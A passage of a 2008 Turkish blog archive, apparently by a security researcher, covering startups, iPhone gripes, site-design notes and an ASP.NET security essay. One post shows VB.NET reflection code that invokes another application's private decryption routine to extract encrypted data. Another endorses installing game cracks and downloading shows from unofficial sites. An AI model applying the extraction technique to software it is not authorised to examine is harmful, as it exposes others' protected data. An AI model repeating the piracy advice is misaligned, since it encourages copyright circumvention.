Oyunlar benim en büyük hobilerimden biridir, sadece oynamak değil kültürü, tuhaf oyunları görmek, yeni akımları incelemek vs. O yüzden her zaman oyun tanıtım yazılarını profesyonel olarak yapmayı da düşünmüşümdür. Lakin kalemimin güçlü olmaması, sektörün maddi yönden tatmin edici olmaması gibi etkenlerden hiç ciddi olarak düşünmedim bile.
Web Girişimcisi
Bir çok kişinin web girişimciliği sadece son senelerdeki patlamaya dayanırken benim hayallerim yaklaşık 9-10 sene önceye dayanıyor (dot-com bubble' ı ve sonrası). Hani şu Google' un henüz Google olmadığı günler. Kişisel bir sürü fikir yanında ilk çalıştığım firmalardan birinde Ali Baba benzeri bir sistem kurmaya çalışıyorduk, bu sırada Türk Ticaret.net açılması ile bizim projemizde hafiften elimizde patlamış oldu. Tabii ki projedeki teknik ve iş planındaki yetersizliklerden bahsetmiyorum bile. Bu dönemde Gitti Gidiyor' un kurucu ekibi ile de hem tanıştık hem de birlikte çalışmıştık. O dönemden bu zamana adam gibi pek internet firması da Türkiye de ayakta duramadı, duranlarda Gitti Gidiyor gibi gerçekten ciddi bir konuma geldiler.

Bunun yanında bir çok startup' ın kurulum sürecinde teknik ekipte geliştirici olarak ya da güvenlik/yazılım danışmanı olarak bulundum, şu an da bir kısmı battı, bir kısmı ise keyfi yerinde devam ediyor. Dolayısıyla klavyede uyumayı, mcdonalds' larda plan yapmayı, evlerde switch' leri kurup yazılım geliştirmeyi, dışarıdan gelen pizzalar ile gün boyu hayat geçirmeyi ve günün sonunda multiplayer bir oyun atmanın tadını bilirim. Nitekim bazen sevdim, bazen nefret ettim...

Web girişimciliği benim uzun soluklu hayallerimden, internet ikinci dot com furyasını yaşarken belki bir fırsat bulur ben de sızarım. Girişimcilik artık bir çok açıdan daha kolay, dolayısıyla hareket etmek için de güzel bir vakit.
Yazarlık
Deneme ve kısa hikaye yazmak sevdiğim işlerden, özellikle bir bilim-kurgu/polisiye arası bir roman yazmayı isterdim ama gel gör ki yeteneğim yok (pardon şöyle ifade edeyim : dünya beni anlamaya hazır değil), yeteneğim de olsa kim yazarlıktan para kazanmış ki?

Daha çok teknoloji ile alakasız olmak istediğim şeyler yazabilseydim keşke ...

Açıkçası hadi ben "meme" yaptım, gitsin herkes yazsın ya da "sen", "sen", "bir de o köşedeki ufak blog sahibi, sen" yaz demeyi sevmiyorum ama siz ben bunu memelerim yazarım derseniz de kimseyi tutacak değilim. Yaparsanız da adresi yorumlara link olarak bırakın lütfen.

Açıkçası benim merak ettiğim bir konu, okuyuclardan da yorumları bekliyorum. Şu anki işinizi yapmasaydanız ne yapardınız? Ya da şöyle dile getireyim "Büyüyünce ne olmak istiyorsun çocuğum?"

Paul Graham ve Girişimcilik Dersleri

Ferruh Mavituna — Cum, 17 Eki 2008 20:47:45 +0300

Bugün bir çok Paul Graham makalesi okudum, How to Start a Startup yazısında şu dikkatimi çekti.

...

So who should start a startup? Someone who is a good hacker, between about 23 and 38, and who wants to solve the money problem in one shot instead of getting paid gradually over a conventional working life.

..

The other cutoff, 38, has a lot more play in it. One reason I put it there is that I don't think many people have the physical stamina much past that age. I used to work till 2:00 or 3:00 AM every night, seven days a week. I don't know if I could do that now.

...

During this time you'll do little but work, because when you're not working, your competitors will be. My only leisure activities were running, which I needed to do to keep working anyway, and about fifteen minutes of reading a night. I had a girlfriend for a total of two months during that three year period. Every couple weeks I would take a few hours off to visit a used bookshop or go to a friend's house for dinner. I went to visit my family twice. Otherwise I just worked.

Doğal olarak yazıyı okurken kendimle kıyaslıyorum ve Graham' ın burada bahsettiği şeyleri ben 18-22 yaşları arasında yaşadım ve maalesef deneyimsizlik ve nasipsizlik yüzünden istediklerimi alamadım. Şimdi ise bunları yapmak bana çok uzak geliyor yani 23 yerine bu işe çok erken girmek beni henüz 38 olmadan 38 gibi hissettirmeye başladı. Tabii ki bu senelerdeki boşa küreklerimiz deneyim olarak geri döndü inşallah ama eğer bir defa daha cesaret eder ve bir startup denersem o zaman göreceğiz, bir daha böyle çalışabilecek miyim? Ya da önceki deneyimler işimize yarayacak mı?

Bu arada söylemeyi unuttum, biraz bariz ama gene de söyleyeyim "tatilden döndüm" :)

Hayat Detoksu

Ferruh Mavituna — Cum, 26 Eyl 2008 22:14:44 +0300

Hayatın ticari toksinlerinden kurtulma amacı ile 15 günlüğüne hayat detoksuna gidiyorum. Bu süre içerisinde yorumlar mucizevi bir şekilde onaylanacak, ancak yeni bir yazı site semalarında gözükmeyecektir.

Şimdi ben 15 gün boyunca yazı yazmayınca tüm site okurları boykota gidecek, hatta insanlar sitelerini kapatıp benim 15 gün blog yazmamamı protesto edecek, imza toplayıp avrupa insan haklarına gidip "blogu okuma haklarının ellerinden alınamayacağını" belirtecek, fanatikler yeni bir worm yazıp Ferruh yazı yazmıyorsa internetin ne anlamı var diyerekten ünlü 13 hayalete DDoS saldırıları düzenleyecekler.

Lütfen arkadaşlar bu tip şeylere gerek yok, bakınız :

SELECT COUNT(*) FROM Article
1737

1.737 yazı sizi bekliyor...

Ben sitede yokken biraz yorum yazın da, site canlı gözüksün. Bir de ben yok hergün bir doz şu videoyu izleyin :

This isn't a seminar, this isn't a weekend retreat. You have to realise that someday you will die, Until you know that, You are useless.

26 Eylül 2008

Ailenizin ziyaretçi kaygısı olmayan, her telden çalan, cümle başına 17 yazım hatası yapan, ayrı yazılan de ve da' lar kan davası olan, sorunlu blogcusu.

iPhone Almamak İçin 22 Neden

Ferruh Mavituna — Pzt, 22 Eyl 2008 16:37:36 +0300

Bir ay kadardır IPhone 3G kullanıyorum, TR' de de herkes sanal kamp yapmaya başlamış o yüzden almadan önce keşke bilseydim dediklerimi yazayım dedim.

Şarjı çok az gidiyor, Vasat bir kullanım ile 1-2 gün civarı,
İnternet beklediğinizden çok daha yavaş, kapsama alanları aslında o kadar da kapsamıyor,
Wireless desteği kötü ve yavaş,
IPhone için kaliteli uygulama çok az, yazılımların yarısı arada bir kitlenip, uçuyor,
Kırmadan (jailbreak vs.) yükleyebileğiniz yazılım sayısı az,
Yazılım geliştirirken maalesef .NET ya da Java desteği yok,
Bir çok video formatını desteklemiyor,
Windows kullanıcıysanız ITunes + Quicktime kurmanız zorunlu ve bunların ikisi de birbirinden rezil ve Windows ortamında saçmalık derecesinde yavaş yazılımlar,
ITunes' un backup alması 1-4 saat arasında sürüyor, genelde sıkılıp MobileBackup.exe yazılımını direk sonlandırmak zorunda kalıyorsunuz.
GPS şaka gibi, internet olmadan çalışmıyor, çalıştığı zamanlarda da süper yavaş çalışıyor. Gerçek ve offline bir GPS yazılım ile gelmiyor, dolayısıyla eğer GPS özelliğini gerçek bir GPS gibi kullanmayı düşünüyorsanız şimdiden vazgeçin,
IPhone içerisindeki dosya, klasörlere direk erişim yok. Herşeyin ITunes üzerinden yapılması gerekiyor bu da senkronizasyon vs. gibi işleri çok zorlaştırıyor. Kendi bilgisayarınızın başında değilken IPhone' unuza müzik, video atmanız imkansız hale geliyor,
Pahalı,
MMS desteği yok,
Her ne kadar işim olmasa da kendi MP3 vs. dosyalarınınizdan ringtone yapmamanız başka salak bir limitasyon,
Ses ile kontrol, Kulaklık üzerinden çağrı kabul etme vs. gibi özellikleri yok,
Iphone 3G' nin bazı eski IPhone / IPod aksesuarları ile uyumsuz olması, Kendini şarj etmemesi vs. (bkz. IDragon)
Safari' de Flash' ın çalışmaması, buna rağmen youtube videoları özel yazılım ile çalışıyor,
PDF, CHM vs. adam gibi hiç bir formatı okuyamıyor olması. O kadarki aslında dosya transferi yapamadığınızdan ve dosya sistemine erişmedeğinizden HTML bile okuyamıyor diyebiliriz. Bu da e-book konseptini öldürüyor.
Apple her zamanki gibi mouse' da 2 butona ne hacet mantığı ile, Kopyala / Yapıştır sizin neyinize diyerekten böyle bir özellik sunmayı da gereksiz bulmuş. Ne de olsa salak bir sanal klavye ile 15 karakter şifre girme çok doğal bir iş.
Uzun listelerde scroll yaparken, parmaklarınızın ağrıması ve hayatınızın gözlerinizin önünde şerit IPhone uygulaması olarak geçmesi.
Kontakları SMS ile gönderememe (Bundan emin değilim, ben henüz bulamadım bulan varsa söylesin),
Video kayıt özelliğinin olmaması.

Yiğidi Öldür Hakkını Yeme Listesi

Bir çok açıdan donanım ve yazılım çok kullanışlı,
Seksi & İnce,
Video kalitesi, müzik kalitesi ve genel olarak IPod fonksiyonu güzel,
Telefon ile konuşurken IPhone' u kullanmaya pürüzsüz devam edebilme, IPod dinlerken gelen çağrıları vs. güzelce kabul edebilme ve yeni arama yapabilme.
Text-render ve görüntü kalitesi,
Ekranın kendini ışığa doğru ayarlaması, dönmesi, kulağınıza getirince ekranın kapanması çekince tekrar açılması ve benzeri sensör aksiyonları,
Kaliteli kulaklık.

Keşke biri Windows Mobile' ı bu donanımın içine koyabilse o zaman dünya çok daha güzel bir yer olurdu...

Yeni Tasarımın Yapılışı - II

Ferruh Mavituna — Paz, 21 Eyl 2008 12:58:30 +0300

Bu yazının ilk bölümü: Yeni Tasarımın Yapılışı - I

Tasarımı HTML’ e aktarmak - 07.04.08

Pazar sabahı, 9:45 gibi uyandım, önce sitenin tasarımını Fireworks üzerinde fena olmayan bir seviyeye getirdim. Bunu yaparken RSS ikonuna ihtiyacım oldu normal RSS ikonlarını Feed Icons sitesinden aldım. Ek olarak e-mail ile RSS’ e üye olacaklar içinde bir ikona ihtiyacım oldu. Onun için de E-mail Subscriptions Icons’ u buldum ve onu da oradan çarptım. Tabii ki ikiside ücretsiz ve serbest şekilde dağıtılıyor, dolayısıyla isteyen sitesinde kullanabilir. İkonları ve benzer dış kaynakları kullanırken lisansa bakmak her zaman önemli, aksi takdirde Süleyman Hocam canımıza okur :)

CSS Tasarımı

Önce istediğimiz yapı için bir CSS şablonu bulmak gerekiyor. CSS’ yi kendimiz de yazabiliriz ama yapılmışı tekrar yapmamak için hemen CSS şablon avına çıkıyoruz. CSS şablonu veren bir çok site var ama şu iki tanesi benim hoşuma gidiyor. Iron Myers – Pure CSS Layouts ve Layout Gala ikiside her tarayıcıda bu CSS’ lerin sorunsuz çalıştığını iddia ediyorlar. Ben de onlara inanıyorum ve CSS’ lerinin basit ve temizliğinden dolayı Layout Gala’ yı seçiyorum.

İlgimi çeken CSS’ yi yüklüyor, Edit+ ile HTML kodlamaya başlıyorum.

Arada bir dizi başka iş yaptım, saat şu an 15:27...

Alıntı CSS’ si oluşturmak

Blog yazarken sık sık gereken bir şey başkalarından alıntı yapmak. O yüzden güzel bir blockquote tagını çok kullanıyorum, bunu belli etmek için güzel bir CSS oluşturmam gerekiyordu. Bu iş için Design Meme’ de güzel bir örnek var ama sadece Firefox’ ta çalışıyor bu da bizim işimizi görmüyor tabii ki. Bende şu an ki sitedeki gibi basit bir şey yapmak istedim. Aşağıdaki gibi bir şey yaptım;

CSS ise şu şekilde;

blockquote{

background: url('mg/openquote.gif') no-repeat left top;
padding-left: 16px;
padding-top:2px;
color:#555;
margin-left:14px;

}

blockquote p,blockquote div,blockquote td,blockquote span{

font:italic 14px "Georgia", serif;

}

İlk İzlenimler

Sağ taraftaki hakkında kısmını da hallettikten sonra aşağıdaki gibi bir HTML’ e ulaştım.

Resimde görülen sağdaki navigasyon kısım başlıklarını şu şekilde bir CSS ile gerçekleştirdim.

div.section h2{
text-align:center;
background: url('/mg/blackdot.gif') repeat-x center;
margin-top:0;
}

div.section h2 span{
font: normal 24px Times, serif;
color:#333;
background-color:#FFF;
padding:0 10px 0 10px;
}

HTML kısmı ise gene çok basit;

ARAMA

Şimdilik güzel gidiyoruz.saat : 17:35. Bir kaç kek ve 330ml Coca Cola tükettim.

Yazı devam edecektir...

.NET Reflection, RCE and Hard Coded Keys

Ferruh Mavituna — Cum, 12 Eyl 2008 12:39:54 +0300

Sometimes you need to extract some data out of another application but the data stored as encrypted. As you might guess generally keys are just hardcoded, but mostly algorithm is custom. Since there is no such a thing as "client-side security", there are so many ways to do decrypt this data.

You can go and reverse the code which is decompiling the application and copy, paste then tweak the code to compile. But this can be a real pain when dependencies and obfuscated code comes into the play. Since new obfuscators taking the advantage of IL tricks, generally it's not easy to use decompiler generated high-level code without heavy modification.

Unless you are a masochist I'd suggest you to use the application's code to do the job.

Find the decryption point and the DLL,
Invoke the related decryption function using reflection.

We use reflection instead of simply referencing the dll because this way it's possible to call any method within any scope such as private and friend which wouldn't be possible otherwise. Also it allows us to easily bypass Strong Name restrictions without touching to the original binary.

Here is the code:

        1: Function Decrypt(ByVal data As String) As String

       2:     'Load Assembly

       3:     Dim CustomAssembly As Assembly = Assembly.Load("DLL.To.Load")

       4:     Dim CustomType As Type = CustomAssembly.GetType("DLL.To.Load.SecretClass", True, False)

       5:  

       6:     Dim CopyObj As Object = CustomAssembly.CreateInstance(CustomType.FullName)

       7:     Dim Res As Object = CustomType.InvokeMember("Decrypt", BindingFlags.InvokeMethod, Nothing, CopyObj, New Object() {data})

       8:  

       9:     Return Res.ToString

      10: End Function

DRM, Spore ve Korsan Yazılım

Ferruh Mavituna — Sal, 09 Eyl 2008 00:14:39 +0300

Daha önceden söylemiştim "legal yazılım kullanmak zor iş" diye. EA şimdi Spore' da ve daha önceden de Mass Effect' te aktivasyon sistemi kullanmış. Yani oyun en azından 10 günde bir internetten kendini onaylamalıymış, aksi takdirde çalışmamaya başlıyormuş. Ek olarak sadece 3 defa aktivasyona izin veriyormuş.

Bildiğiniz gibi ben korsan yazılıma karşıyım ama korsan yazılıma karşı olmak salak olmak anlamına gelmiyor. Bir DVD' nin kopyasını sadece kendiniz için çıkarıyorsanız bile bu işlem bir çok ülkede kanuna aykırı. Şimdi bu oyunlarda da benzer bir durum sözkonusu. Ancak eğer filmin orijinal DVD' sinde bir sorun çıkarsa gidip yeni bir tane mi almanız gerekiyor?

EA' e göre de oyunu 3 defa kurduktan sonra gidip yeni bir oyun almanız gerekiyor (ya da kendilerini telefon ile arayıp derdinizi anlatmanız). Bu firmaların dertlerini anlıyorum ancak bu saçma bir durum ve bilinçli bir tüketici olarak iki defa düşünmeden oyunun crack' ini indirip kurarım -nitekim düzenli olarak yapıyorum-.

Benim teorim basit; firmaların bu şekilde önlemlere gitmesi uzun vadede onların işine yaramayacak ve eninde sonunda bundan vazgeçecekler. Çünkü paranla rezil olmak tam da bu durum için söylenmiş bir söz.

Güzel bir örnek

ATV' nin iste & izle isimli bütün ATV dizilerini online izleyebileceğiniz bir sistemi var. Aylık fiyatı 15 YTL gibi bir fiyat. Bugün HBO' nun Lost' u web üzerinden HD kalitesinde ücretsiz yayınladığını düşünürseniz bence biraz cüretkar bir deneyim ama o kısım önemli değil. Sonuçta bir hizmet ve bence güzel bir adım, ama...

Avrupa Yakası son 3 senedir izlediğim tek yerli dizi diyebilirim ve ben de bu yüzden ATV' nin bu sistemine üye oldum.

ATV dizileri sadece online izlemenize izin veriyor (ve süper bir internet çıkışları yok)
ATV' nin online yayın kalitesi 260*200 gibi bırakın HD' yi NTSC/PAL kalitesine bile yetişmeyen bir kalitede.

Google' da iki tıklama ötemde olan site ise Avrupa Yakası' nı en iyi kalitede download edebileceğim bir formatta sunuyor. Benim çözümüm basit ATV' ye parasını öderim, giderim diğer siteden download ederim. Etik olarak kafam rahat. Çok istiyorlarsa bu akıl almaz hırsızlığım(!) için beni dava edebilirler.

Burada not düşmek lazım ATV' nin sitesinde şu slogan yok:

Satın al ve akıl almaz kötü bir kalitede tüm dizileri izle. Ya da youtube' a git onun kalitesi bile bizden iyi.

Yeni Tasarımın Yapılışı - I

Ferruh Mavituna — Pzt, 08 Eyl 2008 22:09:53 +0300

Bir süredir yeni tasarım yayında. Yeni tasarımı yaparken bir nevi geliştirme günlüğü tutmuştum. Ne yaptım, neler kötü gitti, neler güzel gitti, hangi kaynakları kullandım vs. gibi. Bu dokümanları parça-parça yayınlamaya başlıyorum. Bu serinin birincisi, çok uzun değil bunun gibi 2-3 bölüm daha var. Bütün seri bittikten sonrada genel olarak ne bekliyordum, ne buldum yazısı yazmaya çalışacağım.

Gereksinimler

Temiz ve kullanışlı bir tasarım
Geçerli XHTML Strict veya Transitional
Eskisi gibi tablosuz CSS temelli tasarım
1024*768 ve yukarısı çözünürlüklerde verim
Ortada “fixed” 960px layout, bu şekilde okunurluğun daha yüksek olduğunu düşünüyorum
Geçerli XHTML Strict veya en azından XHTML Transitional kodu olması
Geçerli CSS 2.1
Tüm sitenin UTF-8 olması
Şu anki sistemde sitenin yarısı UTF-8 ama hepsi değil bu hem teknik sorunlara neden oluyor hem de bazı durumlarda Türkçe karakterlerin doğru gösterilmesine engel oluyor.

Ekstra Eklenecek Özellikler

Tamamen yeni ASP.NET altyapısı, Sistemin bir kısmı zaten ASP.NET ama hepsini ASP.NET’ e geçirmek istiyorum
Yorumlar için CAPTCHA desteği
AJAX ile yorumları okuma ve yazma
Site arşiv sayfaları
- Tag tabanlı arşiv
- Tarih tabanlı arşiv
- Ana konu tabanlı arşivler
  - Projeler
  - Araştırma Dokümanları
  - Download
Yeni yorumlardan e-mail ile haberdar etme
Trackback gönderme ve kabul etme
İngilizce arabirim desteği, ikinci adım

Tasarım – 06.04.08

Ben tasarımcı değilim ama tasarımcı olarak bir geçmişim var. Yeni tasarımdaki amaçlarımdan biri daha okunaklı ve daha temiz, curcuna olmayan bir tasarım sunmaktı. Bir şeye başlamadan önce ilham almak için beğendiğim blogların tasarımlarına ve güzel tasarımları listeleyen ilham sitelerine baktım. Kendi beğendiğim blog sitelerine bakarken komik bir şey farkettim, bu sitelerin hiçbirini aslında ziyaret etmiyorum sadece RSS’ ten okuyorum. Bu da “içerik kraldır” lafını tekrar onaylıyor. Tabii ki bunu kendime bahane etmiyorum!

Bu şekilde sağı - solu bir saat kadar dolaştıktan sonra, kendi arşivimdeki eski yaptığım çalışmaları incelemeye başladım. Grafik konularından o kadar uzak kalmışım ki bir şey yapmak çok zor geliyor. O yüzden daha formdayken yaptığım çalışmalardan çalmayı düşünüyordum. Eski PNG dosyaları arasında bir saat kadar harcadıktan sonra ve Fireworks CS3 ile de bir kaç deneme yaptıktan sonra eski materyalleri değiştirip güzel ve basit bir logo çıkardım kendime.

Ben genelde tasarıma logodan başlarım daha sonra da tüm konsepti logo üzerine kurarım. Bu seferde gene o şekilde yaptım. Soldaki logoyu tasarladıktan sonra, bunun üzerine tasarımı geliştirdim.

Önce gazete benzeri bir konsept yakalamaya çalıştım, bu adımda bir kaç rasterize efektli fotografta denedim ama istediğim gibi olmadı, bu sırada daha basit bir aşağıdaki çalışmaya ulaştım.

Ama bu sefer siteyi aşağıdaki gibi, 960px, 2 kolon fixed istiyordum.

Bu şekilde istememin ana nedeni ise orta içeriğin 500px gibi sabit bir şey ile limitleyebilmekti. Dolayısıyla yukarıdaki tasarımı değiştirip, bu şablona uyacak bir hale getirdim. Son zamanlarda wordpress temalarında popüler olan alt kısmı farklı bir renk ile ayırma işlemi de çok hoşuma gittiği için bir de ek bir renk ile footer çalıştım ve ortaya aşağıdaki çıktı.

Deneyimli tasarımcılar çoktan farketmiştir istediğim şablon / CSS Layout ile yukarıdaki tasarımı birleştirmede temel bir arka plan sorunu var. Bu yüzden Logoyu tamamen transparan bir arkaplan ile çalıştım ve header ve footer arka planlarını da yatay olarak tekrar edebilecek bir hale getirdim. Orjinal resimler 1600px uzunluğunda dolayısıyla bir çok monitörde zaten tekrar etmelerine gerek kalmayacak ama tekrar ederlerse de bu tamamen gözükmeyen bir geçiş ile olacak. Basitçe resimlerin soldaki başlangıçları ile sağdaki bitişlerini aynı çizgi üzerinde tuttum. Düz olmadıklarından dolayı bu biraz vakit aldı ama sonunda oldu. Bu işlemi yaparken “Ruler” ve “Grid” leri görünür hale getirmek çok işinize yarayacaktır.

Bütün bunları yapmak ve yukarıdaki hale getirmek yaklaşık 6-7 saat sürdü. Cumartesi öğleden öncem bu işe gitmiş oldu. Pazar sabahı da tasarımdaki son detaylarla oynayıp HTML’ e aktarmaya başladım.

Bir sonraki yarın yazı Pazar sabahından devam edecek....

ASP.NET Güvenliği ve Platform Tasarımı

Ferruh Mavituna — Cum, 05 Eyl 2008 20:01:16 +0300

Öncelikle genel yapılan geyiklerden birini kestirip atalım:

Tüm sunucu-taraflı (server-side) diller aynı seviyede güvenlidir, herşey kodu yazan kişiye bağlıdır.

Bunu unutun, yok böyle bir şey. Hemen açıkça söyleyelim mesela ASP.NET tasarımı PHP ye göre çok daha güvenlidir. Şimdi bir çok kişi yorumlara saldırmadan önce yazıya devam edelim. Mesela Struts (dil değil platform/framework) hatırı sayılır derecede bir çok platformdan daha güvenlidir.

Her dilde ve platformda güvenli olmayan yazılım geliştirebilirsiniz ama bazı platformlarda güvenli olmayan yazılım geliştirmek çok daha kolay. Şimdi bir dilin - platformun güvenlik noktasında nasıl analiz edilebileceğine bir bakalım.

Server-Side dillerin Güvenlik Analiz Kriterleri:

Yazılım güvenliği, platformun kendisinde çıkan açıklar (buffer overflow, yanlış çalışan encoding fonksiyonları vs.)
Platform tarafından sunulan güvenlik kütüphaneleri, fonksiyonlar
Platformun dokümantasyon ve eğitimlerin güvenli yazılım geliştirme pratiklerini teşvik ediyor olması. Güvenli kod yazmanın kolay olması
Güvenli varsayılan ayarlar ve fonksiyonlar varsayılan olarak güvenli şekilde çalışması

Burada bütün platformaları karşılaştırmayacağım zaten farklı platformlardaki teknik yetersizliğimden dolay bunu yapma imkanım da yok ama örnekler verip ASP.NET' in neleri başarılı bir şekilde yaptığını göstermeye çalışacağım.

Platformun Kendisinde Çıkan Açıklar

Bu tip açıklara şu örnekleri verebiliriz : ASP.NET Request Validation Bypass, PHP Global Overwrite, PHP Zend Hash Problemleri, Struts Validation Bypass vs.

PHP bu konuda tamamen sabıkalı, The Month of PHP Bugs bunu bize gösterdi zaten. Burada söyleyecek pek bir şey yok, ASP.NET in .NET Framework' ü üzerinde geliştirilmiş olması aynı Java gibi onu Buffer Overflow ve benzeri ataklardan tamamen korunmasına neden oluyor. Dolayısıyla .NET Framework' ün temelinde bir sorun çıkmadıktan sonra bir dizi güvenlik açığının ASP.NET te görülmesi imkansız hale geliyor.

Bunun harici foksiyonların kendilerinde çok ciddi sorunlar çıkmadı buna rağmen NULL karakterler ile string birleştirme operastyonları etkileme gibi açıkları çıktı. Dolayısıyla ASP.NET' te bu konuda mükemmel değil ama çok da kötü değil.

Güvenlik Kütüphaneleri ve Fonksiyonlar

ASP.NET tasarlandığı gibi kullanıldığında şu sorunların hepsini çözüyor :

SQL Injection
Parameterised Query kullanımı
XSS, Cross-site Scripting
Default olarak control' lerde encoding desteği, Request Validation desteği (bu sadece derinlemesine defans faktörü, sorunun çözümü değil). Bunlara rağmen ASP.NET' in control encoding desteğinin o kadar mükemmel olmadığını da belirtmek lazım.
Güvenli Kullanıcı Sistemi (Login/Logout, Role sistemi, şifre güvenliği vs.)
ASP.NET Membership sistemi basit ve güvenli şekilde bir kullanıcı sistemi oluşturmanıza izin veriyor.
CSRF (Cross-site Request Forgery)
ViewStateUserKey ile uygulama CSRF ataklarına karşı güvenli hale getirilebilir.
CRLF Injections
İç fonksiyonların güvenli olması otomatik olarak CRLF açıklarından (HTTP Splitting) koruyor. Bazı fonksiyonlarda sorun olsa da en azından genelde güvenli diyebiliriz.
Parameter Manipulation
ASP.NET istemci tarafına giden datanın modifiye edilmeden döndüğünü kontrol edebiliyor ama bu aslında pek iyi bir yazılım geliştirme pratiği değil. Eğer istemci tarafına giden datanın aynı olmasını istiyorsanız istemciden gelen parametreyi kullanmaz ve datayı session yada benzeri bir yerde tutarsınız. Buna rağmen bazı yazılımlar scability amaçlı buna ihtiyaç duyabiliyorlar.

Ek olarak ASP.NET Validators var, bunlar sayesinde girdi denetimi yapmakta gayet pratik.

Bunun harici güvenlik ile ilgili bir çok hazır fonksiyon ve kütühane sunuyor:

Şifreleme ve Encoding Kütüphaneleri. Ek olarak bu kütüphaneler UTF8 ve UTF8 olmayan data ile de iyi geçiniyorlar.

Güvenli Yazılım Geliştirmeye Teşvik Etme

ASP.NET' in resmi dokümantasyonu güvenliğe çok önem veriyor. Bir çok güvenlik ile ilgili makale ve bu güvenlik özelliklerinin nasıl kullanılacağına dair dokümantasyon sunuyor. Bundan daha da önemlisi örneklerde Parameterised Query kullanımı gibi güvenli kullanımlar öneriliyor ve gösteriliyor. Bir çok işlem için gerekli fonksiyonlar zaten olduğundan kullanıcıların kendi kodlarını yazması gerekmiyor.

Güvenli Varsayılan Ayarlar ve Fonksiyonlar

Bu en önemli özelliklerden biri ve Microsoft' un güvenlik devriminden beri çok önemverdiği bir unsur. ASP.NET varsayılan olarak hata mesajlarını göstermiyor, debugging' i aktif hale getirmiyor.

Response.Redirect fonksiyonu da varsayılan olarak güvenli fonksiyonlara güzel bir örnek olabilir. Mesela PHP' de sayfa yönlendirme işleminden sonra manuel olarak sayfanın işlemin durdurmanız gerekiyor*. Bunu yapmdığınızda üyelik gerektiren sayfalara şifresiz erişim mümkün olabilir. ASP.NET ise bu fonksiyon varsayılan olarak işlemi durduruyor ama isterseniz ekstra bir parametre ile çağırıp sayafnın işlemesini durdurabiliyorsunuz.

Bu yazı bir karşılaştırma yazısı değil daha çok güvenli platform geliştirmeye güzel bir örnek olarak ASP.NET' i gösterme amaçlıdır. Şu an hangi penetration tester' a sorarsanız sorun ASP.NET sitelerinin genellemede çok daha güvenli olduğunu söyleyecektir**.

Güvenli Kod Yazmak Bunun Neresinde ?

Eğer kod güvensiz yazıldıysa maalesef sizi koruyabilecek bir platform henüz keşfedilmedi, ek olarak mantıksal açıklar da aynı şekilde. Hiç bir yazılım dili ya da platform sizi böyle delice bir şey yapmaktan alı koyamaz!

* Bunun ana nedeni bu fonksiyonun (header) çok jenerik olması.
** En azından 50 site üzerinde penetration testing yapıp, değişik platformlarda değişk siteler ile çalıştığını varsayıyorum.
*** Nihayet uzun bir aradan sonra teorik ama hala teknik bir yazı yazabildim.

Şeytan Yemini ve The Escapists

Ferruh Mavituna — Çar, 27 Ağu 2008 19:19:56 +0300

Bir kaç gün İskoçya - Edinburgh' da olacağım ondan sonra da hafta sonu ufak bir tatile kaçıyoruz.

Bu arada bu yolculukları uzun süredir okumak için vakit kolladığım kitaplardan biri olan Jean-Christophe Grangé' ın Şeytan Yemini kitabına başlamayı düşünüyorum. Grange' ın bu harici tüm kitaplarını zaten okunuştum. Dolayısıyla bunun da süper olduğundan eminim.

Bu sırada bir hafta kadar önce The Escapists' i bitirdim. Süper bir çizgi roman (daha doğrusu graphic novel) değil ama fena da değildi. Bu aralar biraz nostalji yapıyorum ve nedense içimde ciddi bir çizgi roman okuma hissi var. Listemde de Hellboy v1, Watchmen, The Umbrella Academy gibi kitaplar var.

Dönünce bir kaç kitap ve programlama konusunda yazmayı planlıyorum. Bir de 10 sayfadan uzun bir tasarım dizisi yazısı var. Yeni siteyi yapmaya başladığımdan bu yana aldığım notlar ve site geliştirme süreci. Onu da yayınlanabilir formata getiririr getirmez 3-4 blog postu olarak yayınlamaya çalışacağım.

Şehir dışında olacağımdan bu hafta pek bir şey yazamayabilirim ve yorum onayları biraz gecikebilir.

White Papers

Ferruh Mavituna — Pzt, 25 Ağu 2008 03:56:28 +0300

Some of my published white papers in chronological order.

Hiding your identity in the Internet (Turkish) - 26.04.2003

Small XSS Paper - 28.07.2004
Potentially the first paper ever talks about detecting and exploiting XSS vulnerabilities in HTML attributes and Javascript blocks.

A Practical Guide to PGP (Turkish) - 09.01.2005
Practical introduction to PGP, explains basic of PGP with some real world examples.

Attacking and Defending Wireless Networks (Turkish) - 25.12.2005
A Highly detailed document about attacking and defending wireless network.

SQL Injection Cheat Sheet - 15.03.2007
The most comprehensive SQL Injection Cheat Sheet, includes lots of detailed information about SQL injection methods and covers several different databases. Translated into Japanese, Published in "Hacker Japan" Issue 05.2007.

XSS Tunnelling - 10.07.2007
Cutting edge research about exploitation of XSS vulnerabilities. Explains the implementation and idea of tunnelling HTTP traffic through XSS channels to bypass several restrictions and gain a total control over the victim's session.

Deep Blind SQL Injection - 26.10.2007
A new way to exploit Blind SQL Injections which allows attacker to get 16+ different answers at a time from Blind SQL Injections instead of 2 (true or false). Also it's implemented in BSQL Hacker.

SQL Wildcard Attacks - 12.05.2008
A new attack vector against web applications and databases. Affects more than 70% of web applications with an MS SQL Server database. This attack is now documented in the OWASP Testing Guide v3 as well.

SSL Implementation Security FAQ - 14.05.2008
Quite comprehensive FAQ for common SSL implementation security pitfalls.

Yeni Site Yayında!

Ferruh Mavituna — Paz, 24 Ağu 2008 22:11:05 +0300

Nihayet yeni siteyi yayın aldım. Hata raporları başlasın!

Tüm taglama işlemleri henüz bitmedi, onları yapmaya devam ediyorum. Sitede bir sürü yeni özellik var, gezin, tozun kurcalayın. Heryerde RSS var üye olun. Keyfini çıkartın.

Yeni Siteye Geçiş

Ferruh Mavituna — Paz, 24 Ağu 2008 00:27:20 +0300

Bir süredir üzerinde çalıştığım yeni sisteme geçiş çalışmalarına başladım. Önümüzdeki 1-2 gün boyunca yazılan yorumlar yeni sisteme taşınmayabilir ve site düzgün çalışmayabilir.

Yeni site açıldığındada bir kaç kriz yaşanabilir, dolayısıyla hazırlıklı olun ve 23-24 Ağustos tarihlerindeki güzel yorumlarınızın taşınamayacağı ihtimalini gözönünüde bulundurarak yazın.

Hack & Slash Development

Ferruh Mavituna — Cmt, 23 Ağu 2008 12:48:14 +0300

Bu aralar bayağı boktan yazılar yazıyormuş gibi hissediyorum* ama Quantity always trumps quality ve dibi görmeden göğü görmek mümkün değildir diyerekten kendimi avutuyorum**.

